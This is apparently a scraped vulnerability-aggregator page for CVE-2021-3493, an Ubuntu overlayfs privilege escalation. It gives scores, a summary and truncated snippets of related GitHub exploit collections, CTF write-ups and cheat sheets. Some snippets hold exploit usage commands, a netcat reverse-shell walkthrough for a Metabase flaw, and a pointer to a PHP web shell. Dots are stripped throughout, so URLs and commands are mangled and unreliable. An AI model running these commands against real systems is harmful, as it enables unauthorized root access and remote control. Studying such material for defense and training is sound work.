CVE-2021-3493

Published: 17/04/2021 Updated: 07/07/2023
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 663
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The overlayfs implementation in the Linux kernel did not properly validate, with respect to user namespaces, the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces and a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.

Vulnerable Product

canonical ubuntu linux

Mailing Lists

This Metasploit module exploits a vulnerability in Ubuntu's implementation of overlayfs. The vulnerability is the result of failing to verify the ability of a user to set the attributes in a running executable. Specifically, when Overlayfs sends the set attributes data to the underlying file system via vfs_setxattr, it fails to first verify the dat ...

Github Repositories

TryHackMe Challenge writeup for Couch room

Couch - TryHackMe Challenge Writeup Hatami Ra'is Bukhari (Althemier) Challenge link Scanning Nmap scan nmap -sC -sV -oN nmap/resulttxt $IP PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 72p2 Ubuntu 4ubuntu210 (Ubuntu Linux; protocol 20) | ssh-hostkey: | 2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA) | 256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13

⚡️ Information Security Modules This is my public repository on GitHub about my entire evolution process within the information security market Rust Studies Ctf Write-ups Bug Bounty Reports CVEs found Projects 🔥 Contact me If you want to talk to me, this is the only place so far where you can talk to me 📌 Python Studies Here I share with you my progress in Rust s

CVE-2021-3493 UBUNTU OVERLAYFS LOCAL PRIVESC Find out how a vulnerability in OverlayFS allows local users under Ubuntu to gain root privileges Vulnerability Summary An Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces A local attacker could use

CVE-2021-3493

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

OverlayFS---CVE-2021-3493

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit chmod +x exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with r

2021 kernel vulnerability in Ubuntu.

overlayFS CVE-2021-3493 OverlayFs OverlayFS is a Linux kernel module that lets the system combine several mount points into one, so that all the files from each can be accessed within a single directory structure About the vulnerability SSD-Disclosure recently released a PoC for an Ubuntu kernel exploit (link) This vulnerability wa

Be Root Report Prerequisites for this report First, the examples below use the Linux user account www-data This user therefore has restricted rights on most of the server apart from the Web part sudo -i <-- Switches to root sudo -u www-data bash <-- Connects as this user

CVE-2021-3493 Ubuntu vulnerability

CVE-2021-3493

Ubuntu OverlayFS Local Privesc

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

This repo contains Machines and Notes for practicing for EJPTv1/2 exam

eJPT_Prep Hey N1NJ10 👋 This repo contains Machines and Notes for practicing for EJPTv1/2 exam and if you want to interact with community friends you can join this Telegram channel

CVE-2021-3493 Ubuntu OverlayFS Local Privesc (Interactive Bash Shell & Execute Command Entered)

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces A local attacker could use this to gain elevated privileges, due to a patch carried in Ubuntu to allow unprivileged overlayfs mounts

Analytics CVE-2023-38646 zhuanlanzhihucom/p/647355511 CVE-2021-3493 githubcom/briskets/CVE-2021-3493

Analytics-htb-Rce #first clone the repository git clone githubcom/securezeron/CVE-2023-38646 cd CVE-2023-38646 pip install -r requirementstxt python3 CVE-2023-38646-Reverse-Shellpy -h #before running the reverse shell, start a netcat listener, then go back and run the script as follows python3 CVE-2023-38646-Reverse-Shellpy --rhost {Target Ip address} --lhost {your ip-address} -

Hospital GUI shell: githubcom/flozz/p0wny-shell/blob/master/shellphp Ubuntu privilege escalation: githubcom/briskets/CVE-2021-3493 GhostScript command injection: githubcom/jakabakos/CVE-2023-36664-Ghostscript-command-injection

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment Chinese documentation ctrsploit [kənˈteɪnər splɔɪt] , follows sploit-spec v043 Why ctrsploit see here Pre-Built Release githubcom/ctrsploit/ctrsploit/releases Self Build Build in Container make binary && ls -lah bin/release Build in Local make build-ctrsploi

These are not my tools; I just took them from Google and GitHub

Root Kernel tools CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Reference Usage gcc exploitc -o exploit /exploit Exploit 2 ( Pwnkit ) chmod +x pwnkit /pwnkit Exploit 3 Affected systems To remediate the vulnerabilit

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment Chinese documentation ctrsploit [kənˈteɪnər splɔɪt] Why ctrsploit see here Pre-Built Release githubcom/ctrsploit/ctrsploit/releases Self Build Build in Container make binary && ls -lah bin/release Build in Local make build-ctrsploit

Collection of Linux Kernel exploits for CTF.

Linux kernel Exploits This repo is a collection of kernel exploits Sources githubcom/briskets/CVE-2021-3493 githubcom/UncleJ4ck/CVE-2021-41091 githubcom/xkaneiki/CVE-2023-0386 githubcom/leesh3288/CVE-2023-4911 Disclaimer I am not the author of any of these exploits

Personal "King of The Hill" toolkit.

KoTH-Tools Welcome to KoTH-Tools, a collection of custom tools used in TryHackMe's King of the Hill competition These tools are designed for use on Linux machines Table of Contents CVEs Directory Static Directory Monitor Directory Animations Directory Scripts Reverse Shells CVEs Directory This directory contains exploits for CVEs found in the machines CVE-2019-18634-

Tracking interesting Linux (and UNIX) malware. Send PRs

linux-malware Rolling 7 day view of updates from this repo Submissions? Press/academia securelistcom/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ (#19) - Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact wwwbleeping

Getting Started with Hacking on TryHackMe Mehmood Ali Introduction: Step into the realm of cybersecurity! In the modern digital environment, gaining hands-on skills is essential for thriving in this field TryHackMe, a widely recognized online platform, offers an immersive, practical learning experience for those who aspire to be cybersecurity experts This article is here to a

all about localroot which was successfully tested :)

all about localroot which was successfully tested :) CVE-2021-4034 - Pkexec Local Privilege Escalation CVE-2022-0847 - DirtyPipe-Exploit CVE-2022-37706 - LPE-Exploit CVE-2021-3493 - OverlayFS Local Privesc CVE-2022-2588 - DirtyCred CVE-2023-22809 - sudoedit-privesc traitor

Exploits working {tested by me} for various scenarios

Exploit Collection This is my curated collection of working exploits for various vulnerabilities I will keep updating this repository with new and effective exploits CVE-2023-38646 (Metabase) CVE ID: CVE-2023–38646 Description: This vulnerability allowed attackers to execute arbitrary commands on the Metabase server without requiring any authentication Resolved in Met

Embark on my CTFs Journey, where I document my conquests and lessons learned while navigating the dynamic challenges of Capture The Flag contests. From cracking codes to outsmarting puzzles, join me in exploring the diverse landscape of cybersecurity challenges.

Description Welcome to my personal Capture The Flags (CTFs) repository! This repository is created to track my progress, achievements, and detailed notes regarding cybersecurity challenges, especially on popular platforms like TryHackMe, Hack The Box and Rootme Contents This repository contains an organized list of CTF Machines that I have successfully exploited Each entry in

Preparation OSCP

OSCP-Cheat-Sheets Preparation OSCP wwwnetsecfocuscom/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_20html \ scund00rcom/all/oscp/2018/02/25/passing-oscphtml liodeusgithubio/2020/09/18/OSCP-personal-cheatsheethtml blogadithyanakcom/oscp-preparation-guide/linux-privilege-escalation

Tracking my progress on TryHackMe

THM-Captured-Rooms 🚩 Tracking my room completion progress on TryHackMe Rooms Completed Welcome Getting Started How to use TryHackMe JavaScript Basics OpenVPN Learn & win prizes - Fall 2022 Intro to Offensive Security c4ptur3-th3-fl4g Pyramid Of Pain PrintNightmare Cryptography for Dummies Intro to Digital Forensics Linux Fundamentals Part 1 Part 2 Part 3 Win

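[Hello CTF] A collection of outstanding video creators in China's network security and CTF communities

Awsome-SecCTF-Videomaker [Hello CTF] A collection of outstanding video creators in China's network security and CTF communities CTF Individual creators Nickname Focus Main course content Notes 软趴趴の锅边糊 Full stack Top 3: Views 6841 | [CTF] Web: forging a JWT to bypass login authentication Views 4404 | [AWD] Offline network security competitions from 0 to ??: AWD routines plus a target machine demo Views 3860 | [CTF

This project was created to help penetration-testing beginners set up a working environment quickly; to do a good job, one must first sharpen one's tools.

Windows10 Penetration Suite Toolkit within Kali Linux v40 20221206 Update notes: Because Kali's graphical mode consumes resources and causes lag, and is rarely used, the graphical mode has been removed. Reference link Added a large number of practical tools and upgraded some software to the latest version; restructured the directory categories of "vulnerability tools" so that lookup is quicker and easier; restructured the start menu

RedTeam Pentesting learning resources and tools

Pentest-Tips Practice ranges General DVWA: Damn Vulnerable Web Application PIKACHU: a fun web security vulnerability testing platform JVAPP: Java vulnerability practice program A code audit project about PHP Social engineering range: Social Lab is NOT a real social network It is a social engineering wargame NOTE-B: Noteb-B web vulnerability range platform Vulnerability range: quickly set up web security vulnerabilities and third-party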

EzpzCheatSheet This CheatSheet will not have much explanation It is just commands that have been used pwning all of the machines from various platforms and something that I have encountered before Also any notes, CTF and others that help me Also, do check these notes here githubcom/aniqfakhrul/archives ! A Ports Port 21 (FTP) => Commands $ wget -m --no-passive

Metarget is a framework providing automatic constructions of vulnerable infrastructures.

Chinese | English 1 Introduction Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically 11 Why Metarget? During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spen

What's this This project is mainly used to collect the exp for Linux platform privilege promotion, only to help penetration testers quickly achieve privilege promotion in actual combat Information CVE ID Description Kernels CVE-2004-0077 Linux Kernel 2420, 2224, 2425, 2426, 2427 CVE-2004-1235 Linux Kernel 2429 CVE-2005-0736 Linux Kernel 265, 267,

Ethical Hacking Repository

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

Linux Elevation (continuously updated)

What's this This project is mainly used to collect the exp for Linux platform privilege promotion, only to help penetration testers quickly achieve privilege promotion in actual combat Information CVE ID Description Kernels CVE-2004-0077 Linux Kernel 2420, 2224, 2425, 2426, 2427 CVE-2004-1235 Linux Kernel 2429 CVE-2005-0736 Linux Kernel 265, 267,

Linux privilege escalation exploits collection.

Linux Privilege Escalation Exploits Overview The exploits collected in this project are for security learning and research purposes only Kernel Vulnerabilities The possible affected versions are just for the CVE not the exploits CVE-ID Possible affected versions CVE-2022-34918 Linux kernel < 51811 CVE-2022-32250 Linux kernel < 5181 CVE-2022-27666

A collection of good penetration/hacking tools and multi-domain productivity tools I come across

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL ActionScript Ada Arduino AsciiDoc Assembly Astro AutoHotkey Batchfile BitBake Blade BlitzBasic Boo C C# C++ CMake CSS Classic ASP Clojure CodeQL ColdFusion Dart Dockerfile Emacs Lisp Erlang F# FreeMarker Go Groovy HCL HTML Hack Haskell Inno Setup Java JavaScript Jinja Jupyter Notebook KiCad

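PoC collection (continuously updated)

Awesome-POC [Disclaimer] The techniques, ideas and tools covered in this repository are for security research only; no one may use them for unauthorized penetration testing, illegal purposes or profit, and anyone who does bears the consequences. [Continuously updated] Collected and compiled from the internet and other sources: some weak passwords and PoCs related to HVV 2022 and 2023. 0x01 Project navigation CMS vulnerabilities Asp

sec-tools Security tools roundup engine: Droidefense: Advance Android Malware Analysis Framework react-cool-starter: 😎 🐣 A starter boilerplate for a universal web app with the best development experience and a focus on performance and best practices howtheysre: A curated collection of publicly available resources on how technology and tech-savvy organizations around the worl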

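Normal-POC [Disclaimer] The techniques, ideas and tools covered in this repository are for security research only; no one may use them for unauthorized penetration testing, illegal purposes or profit, and anyone who does bears the consequences. 0x01 Project navigation CMS vulnerabilities AspCMS commentListasp SQL injection vulnerability BSPHP indexphp unauthorized access information disclosure vulnerability CmsEasy crossall_actphp SQL injection vuln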

Linux Kernel Exploitation A collection of links related to Linux kernel security and exploitation Updated bimonthly Pull requests are welcome as well Follow @andreyknvl on Twitter to be notified of updates Subscribe to @linkersec on Telegram, Twitter, or Reddit for highlights Trainings See xairyio/trainings/ Contents Books Techniques Exploitation Protection Bypasses

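Vulnerability In memory of what we have always loved All who come are friends, and those who leave are not held back © Edge Security Team Most vulnerabilities in this project were collected from the internet (most note the original author's link 🔗; if anything infringes, please contact us for removal, thank you), and some have been reproduced. If you cite this, please credit the original author's link given in the article, thank you!!! Disclaimer: the materials\FOFA search syntax\POC published by this project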

bounty collection

Contents bounty targets data data components hk1 node modules DbCache Resources for Beginner Bug Bounty Hunters assets javasec study BruteX wordlists loot kalitools Web Applications Hardware Hacking Sniffing Spoofing Vulnerability Analysis Wireless Attacks Forensics Tools image Password Attacks Reverse Engineering Exploitation Tools Information Gathering Reporting Tools Galax

A collection of links related to Linux kernel security and exploitation

Linux Kernel Exploitation A collection of links related to Linux kernel security and exploitation Updated bimonthly Pull requests are welcome as well Follow @andreyknvl on Twitter to be notified of updates Subscribe to @linkersec on Telegram, Twitter, Mastodon, or Reddit for highlights Trainings See xairyio/trainings/ Contents Books Techniques Exploitation Protection B

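A Common Vulnerability PoC Knowledge Base

Awesome-POC [Disclaimer] The techniques, ideas and tools covered in this project are for learning only; no one may use them for illegal purposes or profit, or for unauthorized penetration testing; anyone who does bears the consequences, which have nothing to do with this project. Please read the laws and regulations before using this project. 0x01 Project navigation CMS vulnerabilities 74cms v421 v42129 admin-panel getshell vulnerability 74cms v501 admin-panel cross-site requ

A vulnerability PoC knowledge base

Awesome-POC [Disclaimer] The techniques, ideas and tools covered in this project are for learning only; no one may use them for illegal purposes or profit, or for unauthorized penetration testing; anyone who does bears the consequences, which have nothing to do with this project. Please read the laws and regulations before using this project. 0x01 Project navigation CHECKLIST Nacos vulnerability Checklist SmartBi vulnerability Checklist Security appliance vulnerability Chec

Updated 2023-11-27 08:36:01 Release updates in the last 15 days Update time Project name Version Update notes 2023-11-26 10:48:00 gshark v124 ## Fixed * Fixed the task table initialization issue * Added the full nginx configuration 2023-11-26 04:28:12 PEASS-ng 20231126-a1ab960a 2023-11-26 00:56:40 dalfox v291 ## Changelog * 7458557 fixed typo * 000d2dc chore: update contributors [skip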

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 961 CVE-2022-0847-

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 2023-11-15T09:54:51Z qq-tim-elevation githubcom/vi3t1/qq-tim-elevation CVE-2

TOP All bugbounty pentesting CVE-2023- POC Exp RCE example payload Things

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 202

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 975 CVE-2022-0847-

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 988 CVE-2022-0847-

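PoCs, exploits, scripts, privilege escalation, small tools and more related to penetration testing---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms

Penetration_Testing_POC A collection of PoCs, scripts, tools, articles and other techniques used in penetration testing, shared as notes; additions are welcome. Check whether any tool contains a backdoor or other abnormal behavior; running everything in a virtual environment is recommended. Penetration_Testing_POC Make good use of search [Ctrl+F] IOT Device&Mobile Phone Web APP Privilege escalation helpers PC tools - small tool collection

Quickly search for 1-day patches for third-party open-source libraries included in your project; patch data is updated every night at 11 pm

CVE Diff Checker The main idea of diff checker is to take historical diff code and match it against a downstream (customized) project to check whether the corresponding patched code has been changed Usage: python /mainpy <path to your project code> For example, if a project team includes Qemu as a third-party library and wants to quickly check which vulnerabilities exist in that version of the Qemu source: python /mainpy /qemu-source-521

A mash-up of security knowledge bases from various sources

SecBooks A collection of articles from major knowledge bases and WeChat official accounts; some knowledge bases are deployed with gitbook, and some official accounts are mainly assorted individual articles. Plugins used "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter" # Plugin for automatic table-of-contents generation (book sm) npm install -g gitbook-summ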

PoC in GitHub 2022 CVE-2022-0185 (2022-02-11) A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a f

PoC in GitHub 2023 CVE-2023-0045 missyes/CVE-2023-0045 es0j/CVE-2023-0045 CVE-2023-0179 TurtleARM/CVE-2023-0179-PoC CVE-2023-0297 (2023-01-13) Code Injection in GitHub repository pyload/pyload prior to 050b3dev31 bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad CVE-2023-0315 (2023-01-15) Command Injection in GitHub repository froxlor/froxlor prior to 208 mhaskar/C

One command to detect all remotely exploitable KEV vulnerabilities. Sourced from CISA KEV, Google's Tsunami and Ostorlab's Asteroid.

Known Exploited Vulnerabilities Detector Introduction This project is dedicated to the detection of known exploited vulnerabilities Our goal is to provide a single command to detect all of these vulnerabilities Requirements Docker is required to run scans locally To install docker, please follow these instructions Installing Ostorlab ships as a Python package on pypi To in